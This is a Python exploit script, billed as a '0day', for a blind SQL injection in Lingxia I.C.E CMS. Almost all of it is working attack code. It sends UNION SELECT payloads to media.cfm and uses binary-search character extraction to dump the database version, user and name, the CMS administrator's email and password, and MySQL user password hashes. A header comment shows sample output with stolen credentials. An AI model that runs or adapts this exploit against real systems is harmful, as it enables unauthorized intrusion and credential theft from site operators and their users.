#!/usr/bin/python # ICE CMS Blind SQLi 0day. # [mr_me@pluto ice]$ python icecold.py -p localhost:8080 -t -d /ice/ # # | ---------------------------------------------------- | # | Lingxia I.C.E CMS Remote Blind SQL Injection Exploit | # | by mr_me - net-ninja.net --------------------------- | # # (+) Exploiting target @: # (+) Testing Proxy @ localhost:8080.. # (+) Proxy is working! # (+) Using string 'icon_media_remove.gif' for the true page # (+) This will take time, go grab a coffee.. # # (!) Getting database version: 5.5.9 # (!) Getting database user: root@localhost # (!) Getting database name: ice # (!) Getting ICE administrative account: admin@admin.com:pa$sw0rD # (!) w00t! You have access to MySQL database! # (+) Dumping hashs hold onto your knickers.. # (+) The username and hashed password is: root:*EE4E2773D7530819563F0DC6FCE27446A51C9413 # (+) PoC finished. # # Note to Lingexa: # Next time, acknowledge a kind email. import sys, urllib, re from optparse import OptionParser # all possible decimal values of printable ascii characters # 8 requests per char, much much cleaner. lower_value = 0 upper_value = 126 #global truStr trueStr = "icon_media_remove.gif" vuluri = "media.cfm?session.current_site_id=1&session.user_id=99" basicInfo = {'version':'version()', 'user':'user()', 'name':'database()'} usage = "./%prog [] -t [target] -d [directory]" usage += "\nExample: ./%prog -p localhost:8080 -t -d /amoeba/" parser = OptionParser(usage=usage) parser.add_option("-p", type="string",action="store", dest="proxy", help="HTTP Proxy ") parser.add_option("-t", type="string", action="store", dest="target", help="The Target server ") parser.add_option("-d", type="string", action="store", dest="directory", help="Directory path to the CMS") (options, args) = parser.parse_args() def banner(): print "\n\t| ---------------------------------------------------- |" print "\t| Lingxia I.C.E CMS Remote Blind SQL Injection Exploit |" print "\t| by mr_me - net-ninja.net --------------------------- |\n" if len(sys.argv) < 5: banner() parser.print_help() sys.exit(1) def setTargetHTTP(): if options.target[0:7] != 'http://': options.target = "http://" + options.target return options.target def getProxy(): try: proxy = {'http': "http://"+options.proxy} opener = urllib.FancyURLopener(proxy) except(socket.timeout): print "\n(-) Proxy Timed Out" sys.exit(1) except(),msg: print "\n(-) Proxy Failed" sys.exit(1) return opener def getServerResponse(exploit): if options.proxy: try: options.target = setTargetHTTP() opener = getProxy() check = opener.open(options.target+options.directory+exploit).read() except urllib.error.HTTPError, error: check = error.read() except socket.error: print "(-) Proxy connection failed" sys.exit(1) else: try: check = urllib.urlopen(options.target+options.directory+exploit).read() except urllib.error.HTTPError, error: check = error.read() except urllib.error.URLError: print "(-) Target connection failed, check your address" sys.exit(1) return check # modified version of rsauron's function # thanks bro. def getAsciiValue(URI): lower = lower_value upper = upper_value while lower < upper: try: mid = (lower + upper) / 2 head_URI = URI + ">"+str(mid)+"+--" result = getServerResponse(head_URI) match = re.findall(trueStr,result) if len(match) >= 1: lower = mid + 1 else: upper = mid except (KeyboardInterrupt, SystemExit): raise except: pass if lower > lower_value and lower < upper_value: value = lower else: head_URI = URI + "="+str(lower) result = getServerResponse(head_URI) match = re.findall(trueStr,result) if len(match) >= 1: value = lower else: print "(-) READ xprog's blind sql tutorial!\n" sys.exit(1) return value def doBlindSqlInjection(): print "(+) Using string '%s' for the true page" % (trueStr) print "(+) This will take time, go grab a coffee.." for key in basicInfo: sys.stdout.write("\n(!) Getting database %s: " % (key)) sys.stdout.flush() # it will never go through all 100 iterations for i in range(1,100): request = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+ascii(substring(%s,%s,1))" % (basicInfo[key],str(i))) asciival = getAsciiValue(request) if asciival != 0: sys.stdout.write("%s" % (chr(asciival))) sys.stdout.flush() else: break sys.stdout.write("\n(!) Getting ICE administrative account: ") sys.stdout.flush() for i in range(1,100): getUserAndPass = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+ascii(substring((SELECT+concat" "(email,0x3a,pword)+from+ice.ice_user+limit+0,1),%s,1))" % str(i)) asciival = getAsciiValue(getUserAndPass) if asciival != 0: sys.stdout.write("%s" % (chr(asciival))) sys.stdout.flush() else: pass isMysqlUser = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+(select 1 from mysql.user limit 0,1)=1") result = getServerResponse(isMysqlUser) match = re.findall(trueStr,result) if len(match) >= 1: print "\n(!) w00t! You have access to MySQL database!" print "(+) Dumping hashs hold onto your knickers.." sys.stdout.write("(+) The username and hashed password is: ") sys.stdout.flush() for k in range(1,100): getMysqlUserAndPass = (vuluri+"+union+select+1,2,3,4,5,6+from+ice_user+where+ascii(substring((SELECT+concat" "(user,0x3a,password)+from+mysql.user+limit+0,1),%s,1))" % str(k)) asciival = getAsciiValue(getMysqlUserAndPass) if asciival != 0: sys.stdout.write("%s" % (chr(asciival))) sys.stdout.flush() else: break else: print "\n(-) You do not have access to MySQL database" if __name__ == "__main__": banner() print "(+) Exploiting target @: %s" % (options.target+options.directory) if options.proxy: print "(+) Testing Proxy @ %s.." % (options.proxy) opener = getProxy() try: check = opener.open("http://www.google.com").read() except: check = 0 pass if check >= 1: print "(+) Proxy is working!" else: print "(-) Proxy failed, exiting.." sys.exit(1) doBlindSqlInjection() print "\n(+) PoC finished."